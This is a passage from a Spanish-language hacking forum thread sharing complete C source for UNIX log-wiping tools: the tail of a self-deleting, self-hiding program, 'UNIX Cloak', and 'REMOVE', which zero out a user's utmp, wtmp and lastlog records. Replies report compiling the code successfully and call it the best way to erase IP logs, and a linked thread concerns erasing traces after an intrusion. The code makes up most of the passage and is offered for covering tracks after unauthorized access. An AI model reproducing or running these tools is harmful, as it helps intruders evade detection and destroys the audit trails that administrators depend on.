f_backedup=1;
if (!a_Output) a_Output=a_Input;
if (!f_EditSrc)
a_Input=a_Backup;
}
makeobject();
if (f_Clean)
unlink(a_Dump);
if ((f_Clean || f_NoBackups) && f_backedup) unlink(a_Backup);
}
else if (a_Output)
{
if (!strcmp(a_Input, a_Output))
{
backup(a_Input);
f_backedup=1;
if (!f_EditSrc)
a_Input=a_Backup;
}
makeobject();
if (f_Clean)
unlink(a_Dump);
if ((f_Clean || f_NoBackups) && f_backedup) unlink(a_Backup);
} else
makedump();
if (f_DeleteSelf) unlink(argv[0]);
puts("Done.");
if (f_Security)
{
close(0);
close(1);
close(2);
setsid();
if (a_Hide)
{
execlp(a_Hide, a_Hide, 0);
perror(a_Hide);
}
if (f_Security)
kill(getpid(), SIGKILL);
}
exit(0);
}



Cloack.c
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
/* UNIX Cloak v1.0 (alpha)  Written by: Wintermute of -Resist- */
/* This file totally wipes all presence of you on a UNIX system*/
/* It works on SCO, BSD, Ultrix, HP/UX, and anything else that */
/* is compatible..  This file is for information purposes ONLY!*/

/*--> Begin source...    */
#include <fcntl.h>
#include <utmp.h>
#include <sys/types.h>
#include <unistd.h>
#include <lastlog.h>

main(argc, argv)
    int     argc;
    char    *argv[];
{
    char    *name;
    struct utmp u;
    struct lastlog l;
    int     fd;
    int     i = 0;
    int     done = 0;
    int     size;

    if (argc != 1) {
         if (argc >= 1 && strcmp(argv[1], "cloakme") == 0) {
     printf("You are now cloaked\n");
     goto start;
                                                           }
         else {
      printf("close successful\n");
      exit(0);
      }
   }
    else {
printf("usage: close [file to close]\n");
exit(1);
}
start:
    name = (char *)(ttyname(0)+5);
    size = sizeof(struct utmp);

    fd = open("/etc/utmp", O_RDWR);
    if (fd < 0)
perror("/etc/utmp");
    else {
while ((read(fd, &u, size) == size) && !done) {
    if (!strcmp(u.ut_line, name)) {
done = 1;
memset(&u, 0, size);
lseek(fd, -1*size, SEEK_CUR);
write(fd, &u, size);
close(fd);
    }
}
    }


    size = sizeof(struct lastlog);
    fd = open("/var/adm/lastlog", O_RDWR);
    if (fd < 0)
perror("/var/adm/lastlog");
    else {
lseek(fd, size*getuid(), SEEK_SET);
read(fd, &l, size);
l.ll_time = 0;
strncpy(l.ll_line, "ttyq2 ", 5);
gethostname(l.ll_host, 16);
lseek(fd, size*getuid(), SEEK_SET);
close(fd);
    }
}

Remove.c

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
/*
REMOVE       -- February 26, 1997
Simple Nomad -- Nomad Mobile Research Centre

Universal utmp, wtmp, and lastlog editor. Actually
removes, doesn't leave holes...

Compile "cc -o remove remove.c -DGENERIC" and run
as root. Use -DAIX instead of -DGENERIC for an AIX
machine. Use -DSCO instead of -DGENERIC for a SCO
machine.
*/

#include <stdio.h>
#include <utmp.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#ifndef AIX
#include <lastlog.h>
#else
#include <login.h>
#endif
#include <pwd.h>

#ifdef AIX
#define WTMP "/var/adm/wtmp"
#define UTMP "/etc/utmp"
#define LASTLOG "/etc/security/lastlog" /* Not a binary file in AIX, so */
/* handled a bit differently.   */
char LogParam[7][30]=
{
  "time_last_login=","tty_last_login=","host_last_login=",
  "unsuccessful_login_count=","time_last_unsuccessful_login=",
  "tty_last_unsuccessful_login=","host_last_unsuccessful_login="
};
#endif
#ifdef SCO
#define WTMP "/etc/wtmp"   /* wtmp was here on the SCO box I accessed */
#define UTMP "/var/adm/utmp"
#define LASTLOG "/var/adm/lastlog"
#endif
#ifdef GENERIC  /* Should work with Linux, IRIX, Digital Unix, BSDs, etc */
#define WTMP "/var/adm/wtmp"
#define UTMP "/var/adm/utmp"
#define LASTLOG "/var/adm/lastlog"
#endif

void main(argc,argv)
int  argc;
char *argv[];
{
  int cleanWtmp(char *,int);
  int cleanUtmp(char *,int);
  int cleanLastlog(char *);
  int getCount(char *,char *);
  char line[10];
  int killem, firstcnt, t;

  if(argc!=2)
  {
    printf("Usage: %s acct\n",argv[0]);
    exit(0);
  }
  firstcnt=getCount(WTMP,argv[1]); /* Get an initial count */
  printf("\nREMOVE by Simple Nomad\nNomad Mobile Research Centre (c) 1997\n\n");
  printf("Found %d record(s) for user %s\n",firstcnt,argv[1]);
  printf("Will attempt a lastlog cleanup by default.\n\n");
  printf("#    - remove last # records from utmp/wtmp\n");
  printf("a    - remove (a)ll records from utmp/wtmp\n");
  printf("q    - (q)uit program\n\n");
  printf("Enter selection -> ");
  gets(line);
  if(line[0]==0x51 || line[0]==0x71) exit(0);
  if(line[0]==0x41 || line[0]==0x61) killem=firstcnt;
  else killem=atoi(line);
  if (killem>firstcnt)
  {
    printf("You cannot delete %d records if only %d exist.\n",killem,firstcnt);
    exit(-1);
  }
  t=cleanWtmp(argv[1],killem); /* Now to clean up utmp and wtmp */
  if (t==1) {
    printf("Trouble cleaning up %s.\n",WTMP);
    exit(-1);
  } else printf("REMOVE cleaned up %d record(s) from %s\n",killem,WTMP);
  t=cleanUtmp(argv[1],killem);
  if (t==1) {
    printf("Trouble cleaning up %s.\n",UTMP);
    exit(-1);
  } else printf("REMOVE cleaned up %d record(s) from %s\n",killem,UTMP);
  t=cleanLastlog(argv[1]);    /* Make our attempt at lastlog */
  if (t==1) {
    printf("Trouble cleaning up %s.\n",LASTLOG); exit(-1);
  }
  printf("REMOVE cleaned up %s\n",LASTLOG);
} /* end main */

int getCount(fname,acct) /* Go check wtmp and find out how many records */
char *fname, *acct;
{
  struct utmp utmp_ent;
  int f,cnt=0;

  if((f=open(fname,O_RDWR))>=0){
    while(read(f,&utmp_ent,sizeof(utmp_ent)))if(!strncmp(utmp_ent.ut_name, acct,strlen(acct)))cnt++;
  }
  close(f);
  return(cnt);
} /* end getCount */

int cleanWtmp(acct,killem)
char *acct;
int killem;
{
  struct utmp utmp_ent;
  int fd,count=0;
  if((fd=open(WTMP,O_RDWR))>=0){
    while(read(fd,&utmp_ent,sizeof(utmp_ent)))if(!strncmp(utmp_ent.ut_name,acct,strlen(acct)))count++;
    lseek(fd,0,SEEK_SET);
    while(read(fd,&utmp_ent,sizeof(utmp_ent))&&killem){
      if(!strncmp(utmp_ent.ut_name,acct,strlen(acct))){
        count--;
        if(count+1<=killem){
          bzero((char *)&utmp_ent,sizeof(utmp_ent));
          lseek(fd,-(sizeof(utmp_ent)),SEEK_CUR);
          write(fd,&utmp_ent,sizeof(utmp_ent));
          killem--;
        }
      }
    }
    close(fd);
  }
  else return(1);
} /* end cleanWtmp */

int cleanUtmp(acct,killem)
char *acct;
int killem;
{
  struct utmp utmp_ent;
  int fd;
  if((fd=open(UTMP,O_RDWR))>=0){
    lseek(fd,0,SEEK_SET);
    while(read(fd,&utmp_ent,sizeof(utmp_ent))&&killem){
      if(!strncmp(utmp_ent.ut_name,acct,strlen(acct))){
        if(killem>0){
          bzero((char *)&utmp_ent,sizeof(utmp_ent));
          lseek(fd,-(sizeof(utmp_ent)),SEEK_CUR);
          write(fd,&utmp_ent,sizeof(utmp_ent));
          killem--;
        }
      }
    }
    close(fd);
  }
  else return(1);
} /* end cleanUtmp */

int cleanLastlog(acct) /* The lastlog subroutine */
char *acct;
{
#ifdef AIX /* Quite a kludge for AIX, but what the fuck it works */
  int t,i;
  char entry[200];
  for (i=0;i<7;i++)
  {
    sprintf(entry,"chsec -f %s -s %s -a %s>/dev/null",LASTLOG,acct,LogParam[i]);
    t=system(entry);
    printf("Return code for %s is %d\n",LogParam[i],t);
  }
#else  /* Normal binary lastlog cleanup */
  struct passwd *pwd;
  struct lastlog logit;
  int f;
  if((pwd=getpwnam(acct))){
    if((f=open(LASTLOG,O_RDWR))>=0){
      lseek(f,(long)pwd->pw_uid*sizeof(struct lastlog),0);
      bzero((char *)&logit,sizeof(logit));
      write(f,(char *)&logit,sizeof(logit));
      close(f);
    }
  }
  else return(1);
#endif
} /* end cleanLastlog */

Desconectado Pa531no5

  • *
  • Underc0der
  • Mensajes: 224
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #7 en: Marzo 30, 2010, 11:57:03 am »
Uno en batch estaría tremendo..

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5388
  • Actividad:
    36.67%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #8 en: Marzo 30, 2010, 12:20:59 pm »
Tenia uno en batch


Desconectado OSI

  • *
  • Underc0der
  • Mensajes: 7
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #9 en: Marzo 31, 2010, 11:42:53 am »
Lo compile y me anda perfecto  ;D

Desconectado S[e]C

  • *
  • Underc0der
  • Mensajes: 42
  • Actividad:
    0%
  • Reputación 0
  • I am mine.
    • Ver Perfil
    • Undersecurity
« Respuesta #10 en: Marzo 31, 2010, 03:31:12 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Lo compile y me anda perfecto  ;D

Cual de todos ?
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta



Desconectado syskc0

  • *
  • Underc0der
  • Mensajes: 39
  • Actividad:
    0%
  • Reputación 0
  • Hello Word !!
    • Ver Perfil
    • Email
« Respuesta #11 en: Abril 30, 2010, 01:30:43 pm »
lo mejor para borrar logs ip
se tiene que tener privilegios para ponerlo a andar
pero cuidado se puede borrar el sistema
el mundo es una variable facil inicias facil terminas

=_=

 

¿Te gustó el post? COMPARTILO!



Eliminar rastro y huellas después de una intrusión (Event Log)

Iniciado por LionSec

Respuestas: 3
Vistas: 2599
Último mensaje Diciembre 06, 2014, 03:31:45 pm
por LionSec